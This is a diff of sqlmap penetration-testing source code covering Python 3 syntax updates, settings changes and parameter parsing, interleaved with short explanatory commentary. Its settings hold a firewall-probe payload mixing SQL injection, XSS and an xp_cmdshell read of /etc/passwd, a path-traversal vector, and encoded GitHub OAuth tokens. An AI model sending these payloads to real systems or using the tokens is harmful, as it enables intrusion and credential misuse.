@@ -390,7 +420,7 @@ REFLECTED_VALUE_MARKER = "__REFLECTED_VALUE__"
 REFLECTED_BORDER_REGEX = r"[^A-Za-z]+"

 # Regular expression used for replacing non-alphanum characters
-REFLECTED_REPLACEMENT_REGEX = r".+"
+REFLECTED_REPLACEMENT_REGEX = r"[^\n]{1,100}"

 # Maximum time (in seconds) spent per reflective value(s) replacement
 REFLECTED_REPLACEMENT_TIMEOUT = 3
@@ -410,9 +440,15 @@ DEFAULT_MSSQL_SCHEMA = "dbo"
 # Display hash attack info every mod number of items
 HASH_MOD_ITEM_DISPLAY = 11

+# Display marker for (cracked) empty password
+HASH_EMPTY_PASSWORD_MARKER = "<empty>"
+
 # Maximum integer value
 MAX_INT = sys.maxint

+# Replacement for unsafe characters in dump table filenames
+UNSAFE_DUMP_FILEPATH_REPLACEMENT = '_'
+
 # Options that need to be restored in multiple targets run mode
 RESTORE_MERGED_OPTIONS = ("col", "db", "dnsDomain", "privEsc", "tbl", "regexp", "string", "textOnly", "threads", "timeSec", "tmpPath", "uChar", "user")

@@ -468,7 +504,7 @@ LEGAL_DISCLAIMER = "Usage of sqlmap for attacking targets without prior mutual c
 REFLECTIVE_MISS_THRESHOLD = 20

 # Regular expression used for extracting HTML title
-HTML_TITLE_REGEX = "<title>(?P<result>[^<]+)</title>"
+HTML_TITLE_REGEX = r"<title>(?P<result>[^<]+)</title>"

 # Table used for Base64 conversion in WordPress hash cracking routine
 ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
@@ -493,9 +529,6 @@ BRUTE_TABLE_EXISTS_TEMPLATE = "EXISTS(SELECT %d FROM %s)"
 # Template used for common column existence check
 BRUTE_COLUMN_EXISTS_TEMPLATE = "EXISTS(SELECT %s FROM %s)"

-# Payload used for checking of existence of IDS/IPS/WAF (dummier the better)
-IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert(\"XSS\")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#"
-
 # Data inside shellcodeexec to be filled with random string
 SHELLCODEEXEC_RANDOM_STRING_MARKER = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"

@@ -505,13 +538,16 @@ CHECK_INTERNET_ADDRESS = "https://ipinfo.io/"
 # Value to look for in response to CHECK_INTERNET_ADDRESS
 CHECK_INTERNET_VALUE = "IP Address Details"

-# Vectors used for provoking specific WAF/IPS/IDS behavior(s)
+# Payload used for checking of existence of WAF/IPS (dummier the better)
+IPS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert(\"XSS\")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#"
+
+# Vectors used for provoking specific WAF/IPS behavior(s)
 WAF_ATTACK_VECTORS = (
     "", # NIL
     "search=<script>alert(1)</script>",
     "file=../../../../etc/passwd",
     "q=<invalid>foobar",
-    "id=1 %s" % IDS_WAF_CHECK_PAYLOAD
+    "id=1 %s" % IPS_WAF_CHECK_PAYLOAD
 )

 # Used for status representation in dictionary attack phase
@@ -520,7 +556,7 @@ ROTATING_CHARS = ('\\', '|', '|', '/', '-')
 # Approximate chunk length (in bytes) used by BigArray objects (only last chunk and cached one are held in memory)
 BIGARRAY_CHUNK_SIZE = 1024 * 1024

-# Compress (zlib) level used for storing BigArray chunks to disk (0-9)
+# Compress level used for storing BigArray chunks to disk (0-9)
 BIGARRAY_COMPRESS_LEVEL = 9

 # Maximum number of socket pre-connects
@@ -552,7 +588,7 @@ UNION_CHAR_REGEX = r"\A\w+\Z"
 UNENCODED_ORIGINAL_VALUE = "original"

 # Common column names containing usernames (used for hash cracking in some cases)
-COMMON_USER_COLUMNS = ("login", "user", "username", "user_name", "user_login", "benutzername", "benutzer", "utilisateur", "usager", "consommateur", "utente", "utilizzatore", "usufrutuario", "korisnik", "usuario", "consumidor", "client", "cuser")
+COMMON_USER_COLUMNS = ("login", "user", "username", "user_name", "user_login", "benutzername", "benutzer", "utilisateur", "usager", "consommateur", "utente", "utilizzatore", "utilizator", "utilizador", "usufrutuario", "korisnik", "uporabnik", "usuario", "consumidor", "client", "cuser")

 # Default delimiter in GET/POST values
 DEFAULT_GET_POST_DELIMITER = '&'
@@ -564,7 +600,7 @@ DEFAULT_COOKIE_DELIMITER = ';'
 FORCE_COOKIE_EXPIRATION_TIME = "9999999999"

 # Github OAuth token used for creating an automatic Issue for unhandled exceptions
-GITHUB_REPORT_OAUTH_TOKEN = "NTMyNWNkMmZkMzRlMDZmY2JkMmY0MGI4NWI0MzVlM2Q5YmFjYWNhYQ=="
+GITHUB_REPORT_OAUTH_TOKEN = "NTYzYjhmZWJjYzc0Njg2ODJhNzhmNDg1YzM0YzlkYjk3N2JiMzE3Nw=="

 # Skip unforced HashDB flush requests below the threshold number of cached items
 HASHDB_FLUSH_THRESHOLD = 32
@@ -579,7 +615,7 @@ HASHDB_RETRIEVE_RETRIES = 3
 HASHDB_END_TRANSACTION_RETRIES = 3

 # Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
-HASHDB_MILESTONE_VALUE = "dPHoJRQYvs" # python -c 'import random, string; print "".join(random.sample(string.ascii_letters, 10))'
+HASHDB_MILESTONE_VALUE = "BZzRotigLX" # python -c 'import random, string; print "".join(random.sample(string.ascii_letters, 10))'

 # Warn user of possible delay due to large page dump in full UNION query injections
 LARGE_OUTPUT_THRESHOLD = 1024 ** 2
@@ -612,7 +648,7 @@ BANNER = re.sub(r"\[.\]", lambda _: "[\033[01;41m%s\033[01;49m]" % random.sample
 DUMMY_NON_SQLI_CHECK_APPENDIX = "<'\">"

 # Regular expression used for recognition of file inclusion errors
-FI_ERROR_REGEX = "(?i)[^\n]{0,100}(no such file|failed (to )?open)[^\n]{0,100}"
+FI_ERROR_REGEX = r"(?i)[^\n]{0,100}(no such file|failed (to )?open)[^\n]{0,100}"

 # Length of prefix and suffix used in non-SQLI heuristic checks
 NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6
@@ -621,7 +657,7 @@ NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6
 MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024

 # Maximum response total page size (trimmed if larger)
-MAX_CONNECTION_TOTAL_SIZE = 50 * 1024 * 1024
+MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024

 # For preventing MemoryError exceptions (caused when using large sequences in difflib.SequenceMatcher)
 MAX_DIFFLIB_SEQUENCE_LENGTH = 10 * 1024 * 1024
@@ -642,7 +678,7 @@ VALID_TIME_CHARS_RUN_THRESHOLD = 100
 CHECK_ZERO_COLUMNS_THRESHOLD = 10

 # Boldify all logger messages containing these "patterns"
-BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA", "specific response", "NULL connection is supported")
+BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA", "specific response", "NULL connection is supported", "PASSED", "FAILED")

 # Generic www root directory names
 GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")
@@ -654,7 +690,7 @@ MAX_HELP_OPTION_LENGTH = 18
 MAX_CONNECT_RETRIES = 100

 # Strings for detecting formatting errors
-FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Conversion failed", "String or binary data would be truncated", "Failed to convert", "unable to interpret text value", "Input string was not in a correct format", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal", "DataTypeMismatchException", "CF_SQL_INTEGER", " for CFSQLTYPE ", "cfqueryparam cfsqltype", "InvalidParamTypeException", "Invalid parameter type", "is not of type numeric", "<cfif Not IsNumeric(", "invalid input syntax for integer", "invalid input syntax for type", "invalid number", "character to number conversion error", "unable to interpret text value", "String was not recognized as a valid", "Convert.ToInt", "cannot be converted to a ", "InvalidDataException")
+FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Please enter a", "Conversion failed", "String or binary data would be truncated", "Failed to convert", "unable to interpret text value", "Input string was not in a correct format", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal", "TypeMismatchException", "CF_SQL_INTEGER", " for CFSQLTYPE ", "cfqueryparam cfsqltype", "InvalidParamTypeException", "Invalid parameter type", "is not of type numeric", "<cfif Not IsNumeric(", "invalid input syntax for integer", "invalid input syntax for type", "invalid number", "character to number conversion error", "unable to interpret text value", "String was not recognized as a valid", "Convert.ToInt", "cannot be converted to a ", "InvalidDataException")

 # Regular expression used for extracting ASP.NET view state values
 VIEWSTATE_REGEX = r'(?i)(?P<name>__VIEWSTATE[^"]*)[^>]+value="(?P<result>[^"]+)'
@@ -729,7 +765,7 @@ EVALCODE_KEYWORD_SUFFIX = "_KEYWORD"
 NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File."

 # Infixes used for automatic recognition of parameters carrying anti-CSRF tokens
-CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf")
+CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf", "token")

 # Prefixes used in brute force search for web server document root
 BRUTE_DOC_ROOT_PREFIXES = {
@@ -767,9 +803,9 @@ tr:nth-child(even) {
 background-color: #D3DFEE
 }
 td{
-font-size:10px;
+font-size:12px;
 }
 th{
-font-size:10px;
+font-size:12px;
 }
 </style>"""
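The CSRF_TOKEN_PARAMETER_INFIXES change above widens anti-CSRF recognition to any parameter name containing "token". A quick sketch of the kind of case-insensitive substring test such an infix list supports (the helper below is illustrative, not sqlmap's internal check):

    CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf", "token")

    def looks_like_csrf_token(parameter):
        # substring match against the lowered parameter name
        return any(infix in (parameter or "").lower() for infix in CSRF_TOKEN_PARAMETER_INFIXES)

    for name in ("csrfmiddlewaretoken", "__RequestVerificationToken", "id"):
        print(name, looks_like_csrf_token(name))   # True, True, False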
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

@@ -9,6 +9,7 @@ import atexit
 import os

 from lib.core import readlineng as readline
+from lib.core.common import getSafeExString
 from lib.core.data import logger
 from lib.core.data import paths
 from lib.core.enums import AUTOCOMPLETE_TYPE
@@ -53,28 +54,33 @@ def clearHistory():
     readline.clear_history()

 def saveHistory(completion=None):
-    if not readlineAvailable():
-        return
-
-    if completion == AUTOCOMPLETE_TYPE.SQL:
-        historyPath = paths.SQL_SHELL_HISTORY
-    elif completion == AUTOCOMPLETE_TYPE.OS:
-        historyPath = paths.OS_SHELL_HISTORY
-    else:
-        historyPath = paths.SQLMAP_SHELL_HISTORY
-
-    try:
-        with open(historyPath, "w+"):
-            pass
-    except:
-        pass
-
-    readline.set_history_length(MAX_HISTORY_LENGTH)
-    try:
-        readline.write_history_file(historyPath)
-    except IOError, msg:
-        warnMsg = "there was a problem writing the history file '%s' (%s)" % (historyPath, msg)
-        logger.warn(warnMsg)
+    try:
+        if not readlineAvailable():
+            return
+
+        if completion == AUTOCOMPLETE_TYPE.SQL:
+            historyPath = paths.SQL_SHELL_HISTORY
+        elif completion == AUTOCOMPLETE_TYPE.OS:
+            historyPath = paths.OS_SHELL_HISTORY
+        elif completion == AUTOCOMPLETE_TYPE.API:
+            historyPath = paths.API_SHELL_HISTORY
+        else:
+            historyPath = paths.SQLMAP_SHELL_HISTORY
+
+        try:
+            with open(historyPath, "w+"):
+                pass
+        except:
+            pass
+
+        readline.set_history_length(MAX_HISTORY_LENGTH)
+        try:
+            readline.write_history_file(historyPath)
+        except IOError as ex:
+            warnMsg = "there was a problem writing the history file '%s' (%s)" % (historyPath, getSafeExString(ex))
+            logger.warn(warnMsg)
+    except KeyboardInterrupt:
+        pass

 def loadHistory(completion=None):
     if not readlineAvailable():
@@ -86,14 +92,16 @@ def loadHistory(completion=None):
         historyPath = paths.SQL_SHELL_HISTORY
     elif completion == AUTOCOMPLETE_TYPE.OS:
         historyPath = paths.OS_SHELL_HISTORY
+    elif completion == AUTOCOMPLETE_TYPE.API:
+        historyPath = paths.API_SHELL_HISTORY
     else:
         historyPath = paths.SQLMAP_SHELL_HISTORY

     if os.path.exists(historyPath):
         try:
             readline.read_history_file(historyPath)
-        except IOError, msg:
-            warnMsg = "there was a problem loading the history file '%s' (%s)" % (historyPath, msg)
+        except IOError as ex:
+            warnMsg = "there was a problem loading the history file '%s' (%s)" % (historyPath, getSafeExString(ex))
             logger.warn(warnMsg)

 def autoCompletion(completion=None, os=None, commands=None):
@@ -104,20 +112,20 @@ def autoCompletion(completion=None, os=None, commands=None):
         if os == OS.WINDOWS:
             # Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands
             completer = CompleterNG({
                 "copy": None, "del": None, "dir": None,
                 "echo": None, "md": None, "mem": None,
                 "move": None, "net": None, "netstat -na": None,
                 "ver": None, "xcopy": None, "whoami": None,
             })

         else:
             # Reference: http://en.wikipedia.org/wiki/List_of_Unix_commands
             completer = CompleterNG({
                 "cp": None, "rm": None, "ls": None,
                 "echo": None, "mkdir": None, "free": None,
                 "mv": None, "ifconfig": None, "netstat -natu": None,
                 "pwd": None, "uname": None, "id": None,
             })

         readline.set_completer(completer.complete)
         readline.parse_and_bind("tab: complete")
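The shell history changes above add an API shell history path, route the warning text through getSafeExString() and swallow KeyboardInterrupt while saving. A bare-bones version of the same load/save flow using only the standard readline module (paths and history length are placeholders; on Windows the pyreadline fallback from the earlier hunk would be needed):

    import os
    import readline

    MAX_HISTORY_LENGTH = 1000
    historyPath = os.path.expanduser("~/.demo_shell_history")

    def loadHistory():
        if os.path.exists(historyPath):
            try:
                readline.read_history_file(historyPath)
            except IOError as ex:
                print("there was a problem loading the history file '%s' (%s)" % (historyPath, ex))

    def saveHistory():
        try:
            readline.set_history_length(MAX_HISTORY_LENGTH)
            readline.write_history_file(historyPath)
        except (IOError, KeyboardInterrupt):
            pass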
@@ -1,14 +1,13 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

 import errno
 import os
 import subprocess
-import sys
 import time

 from lib.core.settings import IS_WIN
@@ -24,11 +23,6 @@ else:
     import select
     import fcntl

-    if (sys.hexversion >> 16) >= 0x202:
-        FCNTL = fcntl
-    else:
-        import FCNTL
-
 def blockingReadFromFD(fd):
     # Quick twist around original Twisted function
     # Blocking read from a non-blocking file descriptor
@@ -37,7 +31,7 @@ def blockingReadFromFD(fd):
     while True:
         try:
             output += os.read(fd, 8192)
-        except (OSError, IOError), ioe:
+        except (OSError, IOError) as ioe:
             if ioe.args[0] in (errno.EAGAIN, errno.EINTR):
                 # Uncomment the following line if the process seems to
                 # take a huge amount of cpu time
@@ -58,7 +52,7 @@ def blockingWriteToFD(fd, data):
     try:
         data_length = len(data)
         wrote_data = os.write(fd, data)
-    except (OSError, IOError), io:
+    except (OSError, IOError) as io:
         if io.errno in (errno.EAGAIN, errno.EINTR):
             continue
         else:
@@ -101,8 +95,8 @@ class Popen(subprocess.Popen):
                 (errCode, written) = WriteFile(x, input)
             except ValueError:
                 return self._close('stdin')
-            except (subprocess.pywintypes.error, Exception), why:
-                if why[0] in (109, errno.ESHUTDOWN):
+            except (subprocess.pywintypes.error, Exception) as ex:
+                if ex[0] in (109, errno.ESHUTDOWN):
                     return self._close('stdin')
                 raise

@@ -122,8 +116,8 @@ class Popen(subprocess.Popen):
                 (errCode, read) = ReadFile(x, nAvail, None)
             except (ValueError, NameError):
                 return self._close(which)
-            except (subprocess.pywintypes.error, Exception), why:
-                if why[0] in (109, errno.ESHUTDOWN):
+            except (subprocess.pywintypes.error, Exception) as ex:
+                if ex[0] in (109, errno.ESHUTDOWN):
                     return self._close(which)
                 raise

@@ -140,8 +134,8 @@ class Popen(subprocess.Popen):

             try:
                 written = os.write(self.stdin.fileno(), input)
-            except OSError, why:
-                if why[0] == errno.EPIPE: # broken pipe
+            except OSError as ex:
+                if ex[0] == errno.EPIPE: # broken pipe
                     return self._close('stdin')
                 raise
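The blockingReadFromFD()/blockingWriteToFD() hunks above keep the same retry idiom while only modernizing the except syntax: EAGAIN and EINTR on a non-blocking descriptor mean "try again", anything else is fatal. A POSIX-only sketch of that idiom in isolation (names and the busy-wait loop are illustrative, not sqlmap's exact helpers):

    import errno
    import fcntl
    import os

    def set_nonblocking(fd):
        flags = fcntl.fcntl(fd, fcntl.F_GETFL)
        fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)

    def blocking_read(fd):
        # busy-waits until at least one chunk arrives, mirroring the helper above
        output = b""
        while True:
            try:
                output += os.read(fd, 8192)
            except (OSError, IOError) as ex:
                if ex.args[0] in (errno.EAGAIN, errno.EINTR):
                    continue
                raise
            if output:
                break
        return output

    r, w = os.pipe()
    set_nonblocking(r)
    os.write(w, b"hello")
    print(blocking_read(r))   # b'hello'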
@@ -1,11 +1,10 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-import codecs
 import functools
 import os
 import re
@@ -45,6 +44,7 @@ from lib.core.enums import POST_HINT
 from lib.core.exception import SqlmapFilePathException
 from lib.core.exception import SqlmapGenericException
 from lib.core.exception import SqlmapMissingPrivileges
+from lib.core.exception import SqlmapNoneDataException
 from lib.core.exception import SqlmapSystemException
 from lib.core.exception import SqlmapUserQuitException
 from lib.core.option import _setDBMS
@@ -52,9 +52,11 @@ from lib.core.option import _setKnowledgeBaseAttributes
 from lib.core.option import _setAuthCred
 from lib.core.settings import ASTERISK_MARKER
 from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES
+from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
 from lib.core.settings import DEFAULT_GET_POST_DELIMITER
 from lib.core.settings import HOST_ALIASES
 from lib.core.settings import ARRAY_LIKE_RECOGNITION_REGEX
+from lib.core.settings import INJECT_HERE_REGEX
 from lib.core.settings import JSON_RECOGNITION_REGEX
 from lib.core.settings import JSON_LIKE_RECOGNITION_REGEX
 from lib.core.settings import MULTIPART_RECOGNITION_REGEX
@@ -62,6 +64,7 @@ from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS
 from lib.core.settings import REFERER_ALIASES
 from lib.core.settings import RESTORE_MERGED_OPTIONS
 from lib.core.settings import RESULTS_FILE_FORMAT
+from lib.core.settings import SESSION_SQLITE_FILE
 from lib.core.settings import SUPPORTED_DBMS
 from lib.core.settings import UNENCODED_ORIGINAL_VALUE
 from lib.core.settings import UNICODE_ENCODING
@@ -82,6 +85,7 @@ def _setRequestParams():
         conf.parameters[None] = "direct connection"
         return

+    hintNames = []
     testableParameters = False

     # Perform checks on GET parameters
@@ -100,7 +104,6 @@ def _setRequestParams():

     if conf.data is not None:
         conf.method = HTTPMETHOD.POST if not conf.method or conf.method == HTTPMETHOD.GET else conf.method
-        hintNames = []

         def process(match, repl):
             retVal = match.group(0)
@@ -141,14 +144,14 @@ def _setRequestParams():
             if not (kb.processUserMarks and kb.customInjectionMark in conf.data):
                 conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
                 conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)
-                conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*"[^"]*)"', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data)
+                conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*".+?)"(?<!\\")', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data)
                 conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*)\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data)
                 conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)((true|false|null))\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data)
                 match = re.search(r'(?P<name>[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data)
                 if match and not (conf.testParameter and match.group("name") not in conf.testParameter):
                     _ = match.group(2)
-                    _ = re.sub(r'("[^"]+)"', '\g<1>%s"' % kb.customInjectionMark, _)
-                    _ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', '\g<0>%s' % kb.customInjectionMark, _)
+                    _ = re.sub(r'("[^"]+)"', r'\g<1>%s"' % kb.customInjectionMark, _)
+                    _ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', r'\g<0>%s' % kb.customInjectionMark, _)
                     conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _))

                 kb.postHint = POST_HINT.JSON
||||||
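For orientation, the JSON branch above appends the custom injection mark to every string, number and boolean value found in a JSON POST body, so each value becomes a testable injection point. A rough standalone sketch of the same idea, assuming a '*' marker and using only the two simplified substitutions shown in the hunk (not sqlmap's full helper):

    import re

    CUSTOM_INJECTION_MARK = "*"  # assumed marker; sqlmap keeps the real one in kb.customInjectionMark

    def mark_json_values(data):
        # Append the mark to string values: {"name": "luther"} -> {"name": "luther*"}
        data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*".+?)"(?<!\\")', r'\g<1>%s"' % CUSTOM_INJECTION_MARK, data)
        # Append the mark to numeric values: {"id": 1} -> {"id": 1*}
        data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d.]*)\b', r'\g<1>\g<3>%s' % CUSTOM_INJECTION_MARK, data)
        return data

    print(mark_json_values('{"id": 1, "name": "luther"}'))
    # {"id": 1*, "name": "luther*"}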
@@ -229,9 +232,9 @@ def _setRequestParams():
 if kb.customInjectionMark not in conf.data: # in case that no usable parameter values has been found
 conf.parameters[PLACE.POST] = conf.data

-kb.processUserMarks = True if (kb.postHint and kb.customInjectionMark in conf.data) else kb.processUserMarks
+kb.processUserMarks = True if (kb.postHint and kb.customInjectionMark in (conf.data or "")) else kb.processUserMarks

-if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not kb.customInjectionMark in (conf.data or "") and conf.url.startswith("http"):
+if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and kb.customInjectionMark not in (conf.data or "") and conf.url.startswith("http"):
 warnMsg = "you've provided target URL without any GET "
 warnMsg += "parameters (e.g. 'http://www.site.com/article.php?id=1') "
 warnMsg += "and without providing any POST parameters "

@@ -343,7 +346,7 @@ def _setRequestParams():
 # Url encoding of the header values should be avoided
 # Reference: http://stackoverflow.com/questions/5085904/is-ok-to-urlencode-the-value-in-headerlocation-value

-if httpHeader.title() == HTTP_HEADER.USER_AGENT:
+if httpHeader.upper() == HTTP_HEADER.USER_AGENT.upper():
 conf.parameters[PLACE.USER_AGENT] = urldecode(headerValue)

 condition = any((not conf.testParameter, intersect(conf.testParameter, USER_AGENT_ALIASES, True)))

@@ -352,7 +355,7 @@ def _setRequestParams():
 conf.paramDict[PLACE.USER_AGENT] = {PLACE.USER_AGENT: headerValue}
 testableParameters = True

-elif httpHeader.title() == HTTP_HEADER.REFERER:
+elif httpHeader.upper() == HTTP_HEADER.REFERER.upper():
 conf.parameters[PLACE.REFERER] = urldecode(headerValue)

 condition = any((not conf.testParameter, intersect(conf.testParameter, REFERER_ALIASES, True)))

@@ -361,7 +364,7 @@ def _setRequestParams():
 conf.paramDict[PLACE.REFERER] = {PLACE.REFERER: headerValue}
 testableParameters = True

-elif httpHeader.title() == HTTP_HEADER.HOST:
+elif httpHeader.upper() == HTTP_HEADER.HOST.upper():
 conf.parameters[PLACE.HOST] = urldecode(headerValue)

 condition = any((not conf.testParameter, intersect(conf.testParameter, HOST_ALIASES, True)))

@@ -376,7 +379,7 @@ def _setRequestParams():
 if condition:
 conf.parameters[PLACE.CUSTOM_HEADER] = str(conf.httpHeaders)
 conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: "%s,%s%s" % (httpHeader, headerValue, kb.customInjectionMark)}
-conf.httpHeaders = [(header, value.replace(kb.customInjectionMark, "")) for header, value in conf.httpHeaders]
+conf.httpHeaders = [(_[0], _[1].replace(kb.customInjectionMark, "")) for _ in conf.httpHeaders]
 testableParameters = True

 if not conf.parameters:
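The header hunks above replace title-cased comparisons with comparisons that upper-case both sides, so the User-Agent, Referer and Host branches still match when the header name arrives in a different casing. A minimal hedged illustration (invented constant, not sqlmap's HTTP_HEADER enumeration):

    HTTP_HEADER_USER_AGENT = "User-Agent"  # assumed constant mirroring HTTP_HEADER.USER_AGENT

    def is_user_agent(header_name):
        # HTTP header names are case-insensitive, so normalize both sides instead of title-casing
        return header_name.upper() == HTTP_HEADER_USER_AGENT.upper()

    assert is_user_agent("user-agent")
    assert is_user_agent("USER-AGENT")
    assert not is_user_agent("Referer")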
@@ -390,20 +393,26 @@ def _setRequestParams():
 raise SqlmapGenericException(errMsg)

 if conf.csrfToken:
-if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not re.search(r"\b%s\b" % re.escape(conf.csrfToken), conf.data or "") and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders) and not conf.csrfToken in conf.paramDict.get(PLACE.COOKIE, {}):
+if not any(re.search(conf.csrfToken, ' '.join(_), re.I) for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not re.search(r"\b%s\b" % re.escape(conf.csrfToken), conf.data or "") and conf.csrfToken not in set(_[0].lower() for _ in conf.httpHeaders) and conf.csrfToken not in conf.paramDict.get(PLACE.COOKIE, {}):
-errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken
+errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken._original
 errMsg += "found in provided GET, POST, Cookie or header values"
 raise SqlmapGenericException(errMsg)
 else:
 for place in (PLACE.GET, PLACE.POST, PLACE.COOKIE):
+if conf.csrfToken:
+break

 for parameter in conf.paramDict.get(place, {}):
 if any(parameter.lower().count(_) for _ in CSRF_TOKEN_PARAMETER_INFIXES):
 message = "%s parameter '%s' appears to hold anti-CSRF token. " % (place, parameter)
 message += "Do you want sqlmap to automatically update it in further requests? [y/N] "

 if readInput(message, default='N', boolean=True):
-conf.csrfToken = getUnicode(parameter)
-break
+class _(unicode):
+pass
+conf.csrfToken = _(re.escape(getUnicode(parameter)))
+conf.csrfToken._original = getUnicode(parameter)
+break

 def _setHashDB():
 """
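The CSRF hunk above starts storing the anti-CSRF parameter name as a regular-expression-escaped value (so it can be fed to re.search()) while keeping the raw name for error messages via an _original attribute on a string subclass. A hedged sketch of that trick, using str in place of the Python 2 unicode type used in the diff:

    import re

    class EscapedName(str):
        """String subclass that can also carry the unescaped original value."""
        pass

    def remember_csrf_token(parameter):
        # Keep the regex-escaped form for matching and the raw name for messages
        token = EscapedName(re.escape(parameter))
        token._original = parameter
        return token

    token = remember_csrf_token("csrf.token")
    print(token)            # csrf\.token  (safe to use as a regex)
    print(token._original)  # csrf.token   (readable in error messages)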
@@ -411,15 +420,15 @@ def _setHashDB():
 """

 if not conf.hashDBFile:
-conf.hashDBFile = conf.sessionFile or os.path.join(conf.outputPath, "session.sqlite")
+conf.hashDBFile = conf.sessionFile or os.path.join(conf.outputPath, SESSION_SQLITE_FILE)

 if os.path.exists(conf.hashDBFile):
 if conf.flushSession:
 try:
 os.remove(conf.hashDBFile)
 logger.info("flushing session file")
-except OSError, msg:
+except OSError as ex:
-errMsg = "unable to flush the session file (%s)" % msg
+errMsg = "unable to flush the session file ('%s')" % getSafeExString(ex)
 raise SqlmapFilePathException(errMsg)

 conf.hashDB = HashDB(conf.hashDBFile)

@@ -445,13 +454,10 @@ def _resumeHashDBValues():
 conf.tmpPath = conf.tmpPath or hashDBRetrieve(HASHDB_KEYS.CONF_TMP_PATH)

 for injection in hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []:
-if isinstance(injection, InjectionDict) and injection.place in conf.paramDict and \
-injection.parameter in conf.paramDict[injection.place]:
+if isinstance(injection, InjectionDict) and injection.place in conf.paramDict and injection.parameter in conf.paramDict[injection.place]:

 if not conf.tech or intersect(conf.tech, injection.data.keys()):
 if intersect(conf.tech, injection.data.keys()):
 injection.data = dict(_ for _ in injection.data.items() if _[0] in conf.tech)

 if injection not in kb.injections:
 kb.injections.append(injection)

@@ -466,7 +472,13 @@ def _resumeDBMS():
 value = hashDBRetrieve(HASHDB_KEYS.DBMS)

 if not value:
-return
+if conf.offline:
+errMsg = "unable to continue in offline mode "
+errMsg += "because of lack of usable "
+errMsg += "session data"
+raise SqlmapNoneDataException(errMsg)
+else:
+return

 dbms = value.lower()
 dbmsVersion = [UNKNOWN_DBMS_VERSION]
